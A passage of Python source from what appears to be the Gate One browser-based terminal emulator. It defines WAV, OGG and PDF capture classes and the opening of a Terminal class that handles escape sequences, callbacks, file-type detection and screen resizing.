self.wav_header = struct.unpack( '4si4s4sihhiihh4si', self.re_wav_header.match(data).group()) self.wav_length = self.wav_header[1] + 8 if not self.sent_message: channels = "mono" if self.wav_header[6] == 2: channels = "stereo" if self.wav_length != self.wav_header[12] + 44: # Corrupt WAV file message = _("WAV File is corrupted: Header data mismatch.") term_instance.send_message(message) term_instance.cancel_capture = True message = _("WAV File: %skHz (%s)" % (self.wav_header[7], channels)) term_instance.send_message(message) self.sent_message = True # Update the capture regex with laser precision: self.re_capture = re.compile( b'(RIFF....WAVE.{%s})' % (self.wav_length-12), re.DOTALL) class OGGFile(SoundFile): """ An override of :class:`SoundFile` for OGGs to hard-code the name, regular expressions, mimetype, and suffix. """ name = _("OGG Sound") mimetype = "audio/ogg" suffix = ".ogg" # NOTE: \x02 below marks "start of stream" (\x04 is "end of stream") re_header = re.compile(b'OggS\x00\x02', re.DOTALL) # NOTE: This should never actually match since it will be replaced by the # helper() function: re_capture = re.compile(b'(OggS\x00\x02.+OggS\x00\x04\r\n)', re.DOTALL) re_ogg_header = re.compile(b'(OggS\x00\x02.{21})', re.DOTALL) re_last_segment = re.compile(b'(OggS\x00\x04.{21})', re.DOTALL) def __init__(self, path="", linkpath="", **kwargs): """ **path:** (optional) The path to a file or directory where the file should be stored. If *path* is a directory a random filename will be chosen. """ self.path = path self.linkpath = linkpath self.file_obj = None self.sent_message = False # Sounds will be displayed inline so no icons unless overridden: self.html_icon_template = self.html_template def helper(self, term_instance): """ Called at the start of a OGG file capture. Calculates the length of the file and modifies `self.re_capture` with laser precision. Returns `True` if the entire ogg has been captured. """ data = term_instance.capture last_segment_header = self.re_last_segment.search(data) if not last_segment_header: #print("No last segment header yet") #print(repr(data.split('OggS')[-1])) #print('-----------------------------') return # Haven't reached the end of the OGG yet else: last_segment_header = last_segment_header.group() # This decodes the OGG page header (oggs, version, type_flags, position, serial, sequence, crc, segments) = struct.unpack( "<4sBBqIIiB", last_segment_header) # Figuring out the length of the last set of segments is a little bit # involved... lacing_size = 0 lacings = [] last_segment_header = re.search( # Include the segment table b'(OggS\x00\x04.{%s})' % (21+segments), data, re.DOTALL).group() lacing_bytes = last_segment_header[27:][:segments] for c in map(ord, lacing_bytes): lacing_size += c if c < 255: lacings.append(lacing_size) lacing_size = 0 segment_size = 27 # Initial header size segment_size += sum(ord(e) for e in last_segment_header[27:]) segment_size += len(lacings) # Update the capture regex with laser precision: self.re_capture = re.compile( b'(OggS\x00\x02\x00.+OggS\x00\x04..{%s})' % (segment_size), re.DOTALL) return True def display_metadata(self, term_instance): """ Sends a message to the user that displays the OGG file metadata. Things like ID3 tags, bitrate, channels, etc. """ if not self.sent_message: global _logged_mutagen_warning try: import mutagen.oggvorbis except ImportError: if not _logged_mutagen_warning: _logged_mutagen_warning = True logging.warning(_( "Could not import the mutagen Python module. " "Displaying audio file metadata will be disabled.")) logging.info(_( "TIP: Install mutagen: sudo pip install mutagen")) return oggfile = mutagen.oggvorbis.Open(self.file_obj.name) message = "<pre>%s</pre>" % oggfile.pprint() term_instance.send_message(message) self.sent_message = True class PDFFile(FileType): """ A subclass of :class:`FileType` for PDFs (specifically to override :meth:`self.html`). Has hard-coded name, mimetype, suffix, and regular expressions. This class will also utilize :attr:`self.icondir` to look for an icon named, 'pdf.svg'. If found it will be utilized by :meth:`self.html` when generating output. """ name = _("PDF Document") mimetype = "application/pdf" suffix = ".pdf" re_header = re.compile(br'.*%PDF-[0-9]\.[0-9]{1,2}.+?obj', re.DOTALL) re_capture = re.compile(br'(%PDF-[0-9]\.[0-9]{1,2}.+%%EOF)', re.DOTALL) icon = "pdf.svg" # Name of the file inside of self.icondir # NOTE: Using two separate links below so the whitespace doesn't end up # underlined. Looks much nicer this way. html_icon_template = ( '<span class="pdfcontainer"><a class="pdflink" target="_blank" ' 'href="{link}">{icon}</a><br>' ' <a class="pdflink" href="{link}">{name}</a></span>') html_template = ( '<span class="pdfcontainer"><a target="_blank" href="{link}">{name}</a>' '</span>') is_container = True def __init__(self, path="", linkpath="", icondir=None): """ **path:** (optional) The path to the file. **linkpath:** (optional) The path to use when generating a link in HTML output. **icondir:** (optional) A path to look for a relevant icon to display when generating HTML output. """ self.path = path self.linkpath = linkpath self.icondir = icondir self.file_obj = None self.thumbnail = None def generate_thumbnail(self): """ If available, will use ghostscript (gs) to generate a thumbnail of this PDF in the form of an <img> tag with the src set to a data::URI. """ from commands import getstatusoutput thumb = tempfile.NamedTemporaryFile() params = [ 'gs', # gs must be in your path '-dPDFFitPage', '-dPARANOIDSAFER', '-dBATCH', '-dNOPAUSE', '-dNOPROMPT', '-dMaxBitmap=500000000', '-dAlignToPixels=0', '-dGridFitTT=0', '-dDEVICEWIDTH=90', '-dDEVICEHEIGHT=120', '-dORIENT1=true', '-sDEVICE=jpeg', '-dTextAlphaBits=4', '-dGraphicsAlphaBits=4', '-sOutputFile=%s' % thumb.name, self.path ] retcode, output = getstatusoutput(" ".join(params)) if retcode == 0: # Success data = None with open(thumb.name) as f: data = f.read() thumb.close() # Make sure it gets removed now we've read it if data: encoded = base64.b64encode(data) data_uri = "data:image/jpeg;base64,%s" % encoded.decode('utf-8') return '<img src="%s">' % data_uri def capture(self, data, term_instance): """ Stores *data* as a temporary file and returns that file's object. *term_instance* can be used by overrides of this function to make adjustments to the terminal emulator after the *data* is captured e.g. to make room for an image. """ logging.debug("PDFFile.capture()") # Remove the extra \r's that the terminal adds: data = data.replace(b'\r\n', b'\n') # Write the data to disk in a temporary location if self.path: if os.path.exists(self.path): if os.path.isdir(self.path): # Assume that a path was given for a reason and use a # NamedTemporaryFile instead of TemporaryFile. self.file_obj = tempfile.NamedTemporaryFile( suffix=self.suffix, dir=self.path) # Update self.path to use the new, actual file path self.path = self.file_obj.name else: self.file_obj = open(self.path, 'rb+') else: # Use the terminal emulator's temppath self.file_obj = tempfile.NamedTemporaryFile( suffix=self.suffix, dir=term_instance.temppath) self.path = self.file_obj.name self.file_obj.write(data) self.file_obj.flush() # Ghostscript-based thumbnail generation disabled due to its slow, # blocking nature. Works great though! #self.thumbnail = self.generate_thumbnail() # TODO: Figure out a way to do non-blocking thumbnail generation if self.icondir: pdf_icon = os.path.join(self.icondir, self.icon) if os.path.exists(pdf_icon): with open(pdf_icon) as f: self.thumbnail = f.read() if self.thumbnail: # Make room for our link img_Y = term_instance.cursorY img_X = term_instance.cursorX ref = term_instance.screen[img_Y][img_X] term_instance.screen[img_Y][img_X] = u' ' # No longer at this loc if term_instance.cursorY < 8: # Icons are about ~8 newlines high for line in xrange(8 - term_instance.cursorY): term_instance.newline() # Save the new location term_instance.screen[ term_instance.cursorY][term_instance.cursorX] = ref term_instance.newline() else: # Make room for the characters in the name, "PDF Document" for i in xrange(len(self.name)): term_instance.screen[term_instance.cursorY].pop() # Leave it open return self.file_obj def html(self): """ Returns a link to download the PDF using :attr:`self.linkpath` for the href attribute. Will use :attr:`self.html_icon_template` if :attr:`self.icon` can be found. Otherwise it will just output :attr:`self.name` as a clickable link. """ link = "%s/%s" % (self.linkpath, os.path.split(self.path)[1]) if self.thumbnail: return self.html_icon_template.format( link=link, icon=self.thumbnail, name=self.name) return self.html_template.format( link=link, icon=self.thumbnail, name=self.name) class NotFoundError(Exception): """ Raised by :meth:`Terminal.remove_magic` if a given filetype was not found in :attr:`Terminal.supported_magic`. """ pass class Terminal(object): """ Terminal controller class. """ ASCII_NUL = 0 # Null ASCII_BEL = 7 # Bell (BEL) ASCII_BS = 8 # Backspace ASCII_HT = 9 # Horizontal Tab ASCII_LF = 10 # Line Feed ASCII_VT = 11 # Vertical Tab ASCII_FF = 12 # Form Feed ASCII_CR = 13 # Carriage Return ASCII_SO = 14 # Ctrl-N; Shift out (switches to the G0 charset) ASCII_SI = 15 # Ctrl-O; Shift in (switches to the G1 charset) ASCII_XON = 17 # Resume Transmission ASCII_XOFF = 19 # Stop Transmission or Ignore Characters ASCII_CAN = 24 # Cancel Escape Sequence ASCII_SUB = 26 # Substitute: Cancel Escape Sequence and replace with ? ASCII_ESC = 27 # Escape ASCII_CSI = 155 # Control Sequence Introducer (that nothing uses) ASCII_HTS = 210 # Horizontal Tab Stop (HTS) class_prefix = u'✈' # Prefix used with HTML output span class names # (to avoid namespace conflicts) charsets = { 'B': {}, # Default is USA (aka 'B') '0': { # Line drawing mode 95: u' ', 96: u'◆', 97: u'▒', 98: u'\t', 99: u'\x0c', 100: u'\r', 101: u'\n', 102: u'°', 103: u'±', 104: u'\n', 105: u'\x0b', 106: u'┘', 107: u'┐', 108: u'┌', 109: u'└', 110: u'┼', 111: u'⎺', # All these bars and not a drink! 112: u'⎻', 113: u'─', 114: u'⎼', 115: u'⎽', 116: u'├', 117: u'┤', 118: u'┴', 119: u'┬', 120: u'│', 121: u'≤', 122: u'≥', 123: u'π', 124: u'≠', 125: u'£', 126: u'·' # Centered dot--who comes up with this stuff?!? } } RE_CSI_ESC_SEQ = re.compile(r'\x1B\[([?A-Za-z0-9>;@:\!]*?)([A-Za-z@_])') RE_ESC_SEQ = re.compile( r'\x1b(.*\x1b\\|[ABCDEFGHIJKLMNOQRSTUVWXYZa-z0-9=<>]|[()# %*+].)') RE_TITLE_SEQ = re.compile(r'\x1b\][0-2]\;(.*?)(\x07|\x1b\\)') # The below regex is used to match our optional (non-standard) handler RE_OPT_SEQ = re.compile(r'\x1b\]_\;(.+?)(\x07|\x1b\\)') RE_NUMBERS = re.compile('\d*') # Matches any number RE_SIGINT = re.compile(b'.*\^C', re.MULTILINE|re.DOTALL) def __init__(self, rows=24, cols=80, em_dimensions=None, temppath='/tmp', linkpath='/tmp', icondir=None, encoding='utf-8', async=None, debug=False, enabled_filetypes="all"): """ Initializes the terminal by calling *self.initialize(rows, cols)*. This is so we can have an equivalent function in situations where __init__() gets overridden. If *em_dimensions* are provided they will be used to determine how many lines images will take when they're drawn in the terminal. This is to prevent images that are written to the top of the screen from having their tops cut off. *em_dimensions* must be a dict in the form of:: {'height': <px>, 'width': <px>} The *temppath* will be used to store files that are captured/saved by the terminal emulator. In conjunction with this is the *linkpath* which will be used when creating links to these temporary files. For example, a web-based application may wish to have the terminal emulator store temporary files in /tmp but give clients a completely unrelated URL to retrieve these files (for security or convenience reasons). Here's a real world example of how it works:: >>> term = Terminal( ... rows=10, cols=40, temppath='/var/tmp', linkpath='/terminal') >>> term.write('About to write a PDF\\n') >>> pdf = open('/path/to/somefile.pdf').read() >>> term.write(pdf) >>> term.dump_html() ([u'About to write a PDF ', # <unnecessary lines of whitespace have been removed for this example> u'<a target="_blank" href="/terminal/tmpZoOKVM.pdf">PDF Document</a>']) The PDF file in question will reside in `/var/tmp` but the link was created as `href="/terminal/tmpZoOKVM.pdf"`. As long as your web app knows to look in /var/tmp for incoming '/terminal' requests users should be able to retrieve their documents. http://yourapp.company.com/terminal/tmpZoOKVM.pdf The *icondir* parameter, if given, will be used to provide a relevant icon when outputing a link to a file. When a supported :class:`FileType` is captured the instance will be given the *icondir* as a parameter in a manner similar to this:: filetype_instance = filetype_class(icondir=self.icondir) That way when filetype_instance.html() is called it can display a nice icon to the user... if that particular :class:`FileType` supports icons and the icon it is looking for happens to be available at *icondir*. If *debug* is True, the root logger will have its level set to DEBUG. If *enabled_filetypes* are given (iterable of strings or `FileType` classes) the provided file types will be enabled for this terminal. If not given it will default to enabling 'all' file types. To disable support for all file types simply pass ``None``, ``False``, or an empty list. """ if rows < 2 or cols < 2: raise InvalidParameters(_( "Invalid value(s) given for rows ({rows}) and/or cols " "({cols}). Both must be > 1.").format(rows=rows, cols=cols)) if em_dimensions: if not isinstance(em_dimensions, dict): raise InvalidParameters(_( "The em_dimensions keyword argument must be a dict. " "Here's what was given instead: {0}").format( repr(em_dimensions))) if 'width' not in em_dimensions or 'height' not in em_dimensions: raise InvalidParameters(_( "The given em_dimensions dict ({0}) is missing either " "'height' or 'width'").format(repr(em_dimensions))) if not os.path.exists(temppath): raise InvalidParameters(_( "The given temppath ({0}) does not exist.").format(temppath)) if icondir: if not os.path.exists(icondir): logging.warning(_( "The given icondir ({0}) does not exist.").format(icondir)) if debug: logger = logging.getLogger() logger.level = logging.DEBUG self.temppath = temppath self.linkpath = linkpath self.icondir = icondir self.encoding = encoding self.async = async if enabled_filetypes == "all": enabled_filetypes = [ PDFFile, PNGFile, JPEGFile, WAVFile, OGGFile, ] elif enabled_filetypes: for i, filetype in enumerate(list(enabled_filetypes)): if isinstance(filetype, basestring): # Attempt to convert into a proper class with Python voodoo _class = globals().get(filetype) if _class: enabled_filetypes[i] = _class # Update in-place else: enabled_filetypes = [] self.enabled_filetypes = enabled_filetypes # This controls how often we send a message to the client when capturing # a special file type. The default is to update the user of progress # once every 1.5 seconds. self.message_interval = timedelta(seconds=1.5) self.notified = False # Used to tell if we have notified the user before self.cancel_capture = False # Used by cursor_left() and cursor_right() to handle double-width chars: self.double_width_right = False self.double_width_left = False self.prev_char = u'' self.max_scrollback = 1000 # Max number of lines kept in the buffer self.initialize(rows, cols, em_dimensions) def initialize(self, rows=24, cols=80, em_dimensions=None): """ Initializes the terminal (the actual equivalent to :meth:`__init__`). """ self.cols = cols self.rows = rows self.em_dimensions = em_dimensions self.scrollback_buf = [] self.scrollback_renditions = [] self.title = "Gate One" # This variable can be referenced by programs implementing Terminal() to # determine if anything has changed since the last dump*() self.modified = False self.local_echo = True self.insert_mode = False self.esc_buffer = '' # For holding escape sequences as they're typed. self.cursor_home = 0 self.cur_rendition = unichr(1000) # Should always be reset ([0]) self.init_screen() self.init_renditions() self.current_charset = 0 self.set_G0_charset('B') self.set_G1_charset('B') self.use_g0_charset() # Set the default window margins self.top_margin = 0 self.bottom_margin = self.rows - 1 self.timeout_capture = None self.specials = { self.ASCII_NUL: self.__ignore, self.ASCII_BEL: self.bell, self.ASCII_BS: self.backspace, self.ASCII_HT: self.horizontal_tab, self.ASCII_LF: self.newline, self.ASCII_VT: self.newline, self.ASCII_FF: self.newline, self.ASCII_CR: self.carriage_return, self.ASCII_SO: self.use_g1_charset, self.ASCII_SI: self.use_g0_charset, self.ASCII_XON: self._xon, self.ASCII_CAN: self._cancel_esc_sequence, self.ASCII_XOFF: self._xoff, #self.ASCII_ESC: self._sub_esc_sequence, self.ASCII_ESC: self._escape, self.ASCII_CSI: self._csi, } self.esc_handlers = { # TODO: Make a different set of these for each respective emulation mode (VT-52, VT-100, VT-200, etc etc) '#': self._set_line_params, # Varies '\\': self._string_terminator, # ST 'c': self.clear_screen, # Reset terminal 'D': self.__ignore, # Move/scroll window up one line IND 'M': self.reverse_linefeed, # Move/scroll window down one line RI 'E': self.next_line, # Move to next line NEL 'F': self.__ignore, # Enter Graphics Mode 'G': self.next_line, # Exit Graphics Mode '6': self._dsr_get_cursor_position, # Get cursor position DSR '7': self.save_cursor_position, # Save cursor position and attributes DECSC '8': self.restore_cursor_position, # Restore cursor position and attributes DECSC 'H': self._set_tabstop, # Set a tab at the current column HTS 'I': self.reverse_linefeed, '(': self.set_G0_charset, # Designate G0 Character Set ')': self.set_G1_charset, # Designate G1 Character Set 'N': self.__ignore, # Set single shift 2 SS2 'O': self.__ignore, # Set single shift 3 SS3 '5': self._device_status_report, # Request: Device status report DSR '0': self.__ignore, # Response: terminal is OK DSR 'P': self._dcs_handler, # Device Control String DCS # NOTE: = and > are ignored because the user can override/control # them via the numlock key on their keyboard. To do otherwise would # just confuse people. '=': self.__ignore, # Application Keypad DECPAM '>': self.__ignore, # Exit alternate keypad mode '<': self.__ignore, # Exit VT-52 mode 'Z': self._csi_device_identification, } self.csi_handlers = { 'A': self.cursor_up, 'B': self.cursor_down, 'C': self.cursor_right, 'D': self.cursor_left, 'E': self.cursor_next_line, # NOTE: Not the same as next_line() 'F': self.cursor_previous_line, 'G': self.cursor_horizontal_absolute, 'H': self.cursor_position, 'L': self.insert_line, 'M': self.delete_line, #'b': self.repeat_last_char, # TODO 'c': self._csi_device_identification, # Device status report (DSR) 'g': self.__ignore, # TODO: Tab clear 'h': self.set_expanded_mode, 'i': self.__ignore, # ESC[5i is "redirect to printer", ESC[4i ends it 'l': self.reset_expanded_mode, 'f': self.cursor_position, 'd': self.cursor_position_vertical, # Vertical Line Position Absolute (VPA) #'e': self.cursor_position_vertical_relative, # VPR TODO 'J': self.clear_screen_from_cursor, 'K': self.clear_line_from_cursor, 'S': self.scroll_up, 'T': self.scroll_down, 's': self.save_cursor_position, 'u': self.restore_cursor_position, 'm': self._set_rendition, 'n': self._csi_device_status_report, # <ESC>[6n is the only one I know of (request cursor position) 'p': self.reset, # TODO: "!p" is "Soft terminal reset". Also, "Set conformance level" (VT100, VT200, or VT300) 'r': self._set_top_bottom, # DECSTBM (used by many apps) 'q': self.set_led_state, # Seems a bit silly but you never know 'P': self.delete_characters, # DCH Deletes the specified number of chars 'X': self._erase_characters, # ECH Same as DCH but also deletes renditions 'Z': self.insert_characters, # Inserts the specified number of chars '@': self.insert_characters, # Inserts the specified number of chars #'`': self._char_position_row, # Position cursor (row only) #'t': self.window_manipulation, # TODO #'z': self.locator, # TODO: DECELR "Enable locator reporting" } # Used to store what expanded modes are active self.expanded_modes = { # Important defaults '1': False, # Application Cursor Keys '7': False, # Autowrap '25': True, # Show Cursor } self.expanded_mode_handlers = { # Expanded modes take a True/False argument for set/reset '1': partial(self.expanded_mode_toggle, '1'), '2': self.__ignore, # DECANM and set VT100 mode (and lock keyboard) '3': self.__ignore, # 132 Column Mode (DECCOLM) '4': self.__ignore, # Smooth (Slow) Scroll (DECSCLM) '5': self.__ignore, # Reverse video (might support in future) '6': self.__ignore, # Origin Mode (DECOM) # Wraparound Mode (DECAWM): '7': partial(self.expanded_mode_toggle, '7'), '8': self.__ignore, # Auto-repeat Keys (DECARM) # Send Mouse X & Y on button press: '9': partial(self.expanded_mode_toggle, '9'), '12': self.__ignore, # SRM or Start Blinking Cursor (att610) '18': self.__ignore, # Print form feed (DECPFF) '19': self.__ignore, # Set print extent to full screen (DECPEX) '25': partial(self.expanded_mode_toggle, '25'), '38': self.__ignore, # Enter Tektronix Mode (DECTEK) '41': self.__ignore, # more(1) fix (whatever that is) '42': self.__ignore, # Enable Nation Replacement Character sets (DECNRCM) '44': self.__ignore, # Turn On Margin Bell '45': self.__ignore, # Reverse-wraparound Mode '46': self.__ignore, # Start Logging '47': self.toggle_alternate_screen_buffer, # Use Alternate Screen Buffer '66': self.__ignore, # Application keypad (DECNKM) '67': self.__ignore, # Backarrow key sends delete (DECBKM) # Send Mouse X/Y on button press and release: '1000': partial(self.expanded_mode_toggle, '1000'), # Use Hilite Mouse Tracking: '1001': partial(self.expanded_mode_toggle, '1001'), # Use Cell Motion Mouse Tracking: '1002': partial(self.expanded_mode_toggle, '1002'), # Use All Motion Mouse Tracking: '1003': partial(self.expanded_mode_toggle, '1003'), # Send FocusIn/FocusOut events: '1004': partial(self.expanded_mode_toggle, '1004'), # Enable UTF-8 Mouse Mode: '1005': partial(self.expanded_mode_toggle, '1005'), # Enable SGR Mouse Mode: '1006': partial(self.expanded_mode_toggle, '1006'), '1010': self.__ignore, # Scroll to bottom on tty output '1011': self.__ignore, # Scroll to bottom on key press '1035': self.__ignore, # Enable special modifiers for Alt and NumLock keys '1036': self.__ignore, # Send ESC when Meta modifies a key '1037': self.__ignore, # Send DEL from the editing-keypad Delete key '1047': self.__ignore, # Use Alternate Screen Buffer '1048': self.__ignore, # Save cursor as in DECSC # Save cursor as in DECSC and use Alternate Screen Buffer, # clearing it first: '1049': self.toggle_alternate_screen_buffer_cursor, '1051': self.__ignore, # Set Sun function-key mode '1052': self.__ignore, # Set HP function-key mode '1060': self.__ignore, # Set legacy keyboard emulation (X11R6) '1061': self.__ignore, # Set Sun/PC keyboard emulation of VT220 keyboard } self.callbacks = { CALLBACK_SCROLL_UP: {}, CALLBACK_CHANGED: {}, CALLBACK_CURSOR_POS: {}, CALLBACK_DSR: {}, CALLBACK_TITLE: {}, CALLBACK_BELL: {}, CALLBACK_OPT: {}, CALLBACK_MODE: {}, CALLBACK_RESET: {}, CALLBACK_LEDS: {}, CALLBACK_MESSAGE: {}, } self.leds = { 1: False, 2: False, 3: False, 4: False } # supported_magic gets assigned via self.add_magic() below self.supported_magic = [] # Dict for magic "numbers" so we can tell when a particular type of # file begins and ends (so we can capture it in binary form and # later dump it out via dump_html()) # The format is 'beginning': 'whole' self.magic = OrderedDict() # magic_map is like magic except it is in the format of: # 'beginning': <filetype class> self.magic_map = {} # Supported magic (defaults) for filetype in self.enabled_filetypes: self.add_magic(filetype) # NOTE: The order matters! Some file formats are containers that can # hold other file formats. For example, PDFs can contain JPEGs. So if # we match JPEGs before PDFs we might make a match when we really wanted # to match the overall container (the PDF). self.matched_header = None # These are for saving self.screen and self.renditions so we can support # an "alternate buffer" self.alt_screen = None self.alt_renditions = None self.alt_cursorX = 0 self.alt_cursorY = 0 self.saved_cursorX = 0 self.saved_cursorY = 0 self.saved_rendition = [None] self.capture = b"" self.captured_files = {} self.file_counter = pua_counter() # This is for creating a new point of reference every time there's a new # unique rendition at a given coordinate self.rend_counter = unicode_counter() # Used for mapping unicode chars to acutal renditions (to save memory): self.renditions_store = { u' ': [], # Nada, nothing, no rendition. Not the same as below next(self.rend_counter): [0] # Default is actually reset } self.watcher = None # Placeholder for the file watcher thread (if used) def add_magic(self, filetype): """ Adds the given *filetype* to :attr:`self.supported_magic` and generates the necessary bits in :attr:`self.magic` and :attr:`self.magic_map`. *filetype* is expected to be a subclass of :class:`FileType`. """ #logging.debug("add_magic(%s)" % filetype) if filetype in self.supported_magic: return # Nothing to do; it's already there self.supported_magic.append(filetype) # Wand ready... for Type in self.supported_magic: self.magic.update({Type.re_header: Type.re_capture}) # magic_map is just a convenient way of performing magic, er, I # mean referencing filetypes that match the supported magic numbers. for Type in self.supported_magic: self.magic_map.update({Type.re_header: Type}) def remove_magic(self, filetype): """ Removes the given *filetype* from :attr:`self.supported_magic`, :attr:`self.magic`, and :attr:`self.magic_map`. *filetype* may be the specific filetype class or a string that can be either a filetype.name or filetype.mimetype. """ found = None if isinstance(filetype, basestring): for Type in self.supported_magic: if Type.name == filetype: found = Type break elif Type.mimetype == filetype: found = Type break else: for Type in self.supported_magic: if Type == filetype: found = Type break if not found: raise NotFoundError("%s not found in supported magic" % filetype) self.supported_magic.remove(Type) del self.magic[Type.re_header] del self.magic_map[Type.re_header] def update_magic(self, filetype, mimetype): """ Replaces an existing FileType with the given *mimetype* in :attr:`self.supported_magic` with the given *filetype*. Example:: >>> import terminal >>> term = terminal.Terminal() >>> class NewPDF = class(terminal.PDFile) >>> # Open PDFs immediately in a new window >>> NewPDF.html_template = "<script>window.open({link})</script>" >>> NewPDF.html_icon_template = NewPDF.html_template # Ignore icon >>> term.update_magic(NewPDF, mimetype="application/pdf") """ # Find the matching magic filetype for i, Type in enumerate(self.supported_magic): if Type.mimetype == mimetype: break # Replace self.magic and self.magic_map del self.magic[Type.re_header] del self.magic_map[Type.re_header] self.magic.update({filetype.re_header: filetype.re_capture}) self.magic_map.update({filetype.re_header: filetype}) # Finally replace the existing filetype in supported_magic self.supported_magic[i] = filetype def init_screen(self): """ Fills :attr:`screen` with empty lines of (unicode) spaces using :attr:`self.cols` and :attr:`self.rows` for the dimensions. .. note:: Just because each line starts out with a uniform length does not mean it will stay that way. Processing of escape sequences is handled when an output function is called. """ logging.debug('init_screen()') self.screen = [array('u', u' ' * self.cols) for a in xrange(self.rows)] # Tabstops self.tabstops = set(range(7, self.cols, 8)) # Base cursor position self.cursorX = 0 self.cursorY = 0 self.rendition_set = False def init_renditions(self, rendition=unichr(1000)): # Match unicode_counter """ Replaces :attr:`self.renditions` with arrays of *rendition* (characters) using :attr:`self.cols` and :attr:`self.rows` for the dimenions. """ logging.debug( "init_renditions(%s)" % rendition.encode('unicode_escape')) # The actual renditions at various coordinates: self.renditions = [ array('u', rendition * self.cols) for a in xrange(self.rows)] def init_scrollback(self): """ Empties the scrollback buffers (:attr:`self.scrollback_buf` and :attr:`self.scrollback_renditions`). """ self.scrollback_buf = [] self.scrollback_renditions = [] def add_callback(self, event, callback, identifier=None): """ Attaches the given *callback* to the given *event*. If given, *identifier* can be used to reference this callback leter (e.g. when you want to remove it). Otherwise an identifier will be generated automatically. If the given *identifier* is already attached to a callback at the given event that callback will be replaced with *callback*. :event: The numeric ID of the event you're attaching *callback* to. The :ref:`callback constants <callback_constants>` should be used as the numerical IDs. :callback: The function you're attaching to the *event*. :identifier: A string or number to be used as a reference point should you wish to remove or update this callback later. Returns the identifier of the callback. to Example:: >>> term = Terminal() >>> def somefunc(): pass >>> id = "myref" >>> ref = term.add_callback(term.CALLBACK_BELL, somefunc, id) .. note:: This allows the controlling program to have multiple callbacks for the same event. """ if not identifier: identifier = callback.__hash__() self.callbacks[event][identifier] = callback return identifier def remove_callback(self, event, identifier): """ Removes the callback referenced by *identifier* that is attached to the given *event*. Example:: >>> term.remove_callback(CALLBACK_BELL, "myref") """ del self.callbacks[event][identifier] def remove_all_callbacks(self, identifier): """ Removes all callbacks associated with *identifier*. """ for event, identifiers in self.callbacks.items(): try: del self.callbacks[event][identifier] except KeyError: pass # No match, no biggie def send_message(self, message): """ A convenience function for calling all CALLBACK_MESSAGE callbacks. """ logging.debug('send_message(%s)' % message) try: for callback in self.callbacks[CALLBACK_MESSAGE].values(): callback(message) except TypeError: pass def send_update(self): """ A convenience function for calling all CALLBACK_CHANGED callbacks. """ #logging.debug('send_update()') try: for callback in self.callbacks[CALLBACK_CHANGED].values(): callback() except TypeError: pass def send_cursor_update(self): """ A convenience function for calling all CALLBACK_CURSOR_POS callbacks. """ #logging.debug('send_cursor_update()') try: for callback in self.callbacks[CALLBACK_CURSOR_POS].values(): callback() except TypeError: pass def reset(self, *args, **kwargs): """ Resets the terminal back to an empty screen with all defaults. Calls :meth:`Terminal.callbacks[CALLBACK_RESET]` when finished. .. note:: If terminal output has been suspended (e.g. via ctrl-s) this will not un-suspend it (you need to issue ctrl-q to the underlying program to do that). """ logging.debug('reset()') self.leds = { 1: False, 2: False, 3: False, 4: False } self.expanded_modes = { # Important defaults '1': False, '7': False, '25': True, } self.local_echo = True self.title = "Gate One" self.esc_buffer = '' self.insert_mode = False self.rendition_set = False self.current_charset = 0 self.set_G0_charset('B') self.set_G1_charset('B') self.use_g0_charset() self.top_margin = 0 self.bottom_margin = self.rows - 1 self.alt_screen = None self.alt_renditions = None self.alt_cursorX = 0 self.alt_cursorY = 0 self.saved_cursorX = 0 self.saved_cursorY = 0 self.saved_rendition = [None] self.init_screen() self.init_renditions() self.init_scrollback() try: for callback in self.callbacks[CALLBACK_RESET].values(): callback() except TypeError: pass def __ignore(self, *args, **kwargs): """ Does nothing (on purpose!). Used as a placeholder for unimplemented functions. """ pass def resize(self, rows, cols, em_dimensions=None): """ Resizes the terminal window, adding or removing *rows* or *cols* as needed. If *em_dimensions* are provided they will be stored in *self.em_dimensions* (which is currently only used by image output). """ logging.debug( "resize(%s, %s, em_dimensions: %s)" % (rows, cols, em_dimensions)) if em_dimensions: self.em_dimensions = em_dimensions if rows == self.rows and cols == self.cols: return # Nothing to do--don't mess with the margins or the cursor if rows < self.rows: # Remove rows from the top for i in xrange(self.rows - rows): line = self.screen.pop(0) # Add it to the scrollback buffer so it isn't lost forever self.scrollback_buf.append(line) rend = self.renditions.pop(0) self.scrollback_renditions.append(rend) elif rows > self.rows: # Add rows at the bottom for i in xrange(rows - self.rows): line = array('u', u' ' * self.cols) renditions = array('u', unichr(1000) * self.cols) self.screen.append(line) self.renditions.append(renditions) self.rows = rows self.top_margin = 0 self.bottom_margin = self.rows - 1 # Fix the cursor location: if self.cursorY >= self.rows: self.cursorY = self.rows - 1 if cols > self.cols: # Add cols to the right for i in xrange(self.rows): for j in xrange(cols - self.cols): self.screen[i].append(u' ') self.renditions[i].append(unichr(1000)) self.cols = cols # Fix the cursor location: if self.cursorX >= self.cols: self.cursorX = self.cols - 1 self.rendition_set = False def _set_top_bottom(self, settings): """ DECSTBM - Sets :attr:`self.top_margin` and :attr:`self.bottom_margin` using the provided settings in the form of '<top_margin>;<bottom_margin>'. .. note:: This also handles restore/set "DEC Private Mode Values". """ #logging.debug("_set_top_bottom(%s)" % settings) # NOTE: Used by screen and vi so this needs to work and work well! if len(settings): if settings.startswith('?'): # This is a set/restore DEC PMV sequence return # Ignore (until I figure out what this should do) top, bottom = settings.split(';') self.top_margin = max(0, int(top) - 1) # These are 0-based if bottom: self.bottom_margin = min(self.rows - 1, int(bottom) - 1) else: # Reset to defaults (full screen margins) self.top_margin, self.bottom_margin = 0, self.rows - 1 def get_cursor_position(self): """ Returns the current cursor positition as a tuple:: (row, col) """ return (self.cursorY, self.cursorX) def set_title(self, title): """ Sets :attr:`self.title` to *title* and executes :meth:`Terminal.callbacks[CALLBACK_TITLE]` """ self.title = title try: for callback in self.callbacks[CALLBACK_TITLE].values(): callback() except TypeError as e: logging.error(_("Got TypeError on CALLBACK_TITLE...")) logging.error(repr(self.callbacks[CALLBACK_TITLE])) logging.error(e) def get_title(self): """Returns :attr:`self.title`""" return self.title # TODO: put some logic in these save/restore functions to walk the current # rendition line to come up with a logical rendition for that exact spot. def save_cursor_position(self, mode=None): """ Saves the cursor position and current rendition settings to :attr:`self.saved_cursorX`, :attr:`self.saved_cursorY`, and :attr:`self.saved_rendition` .. note:: Also handles the set/restore "Private Mode Settings" sequence. """ if mode: # Set DEC private mode # TODO: Need some logic here to save the current expanded mode # so we can restore it in _set_top_bottom(). self.set_expanded_mode(mode) # NOTE: args and kwargs are here to make sure we don't get an exception # when we're called via escape sequences. self.saved_cursorX = self.cursorX self.saved_cursorY = self.cursorY self.saved_rendition = self.cur_rendition def restore_cursor_position(self, *args, **kwargs): """ Restores the cursor position and rendition settings from 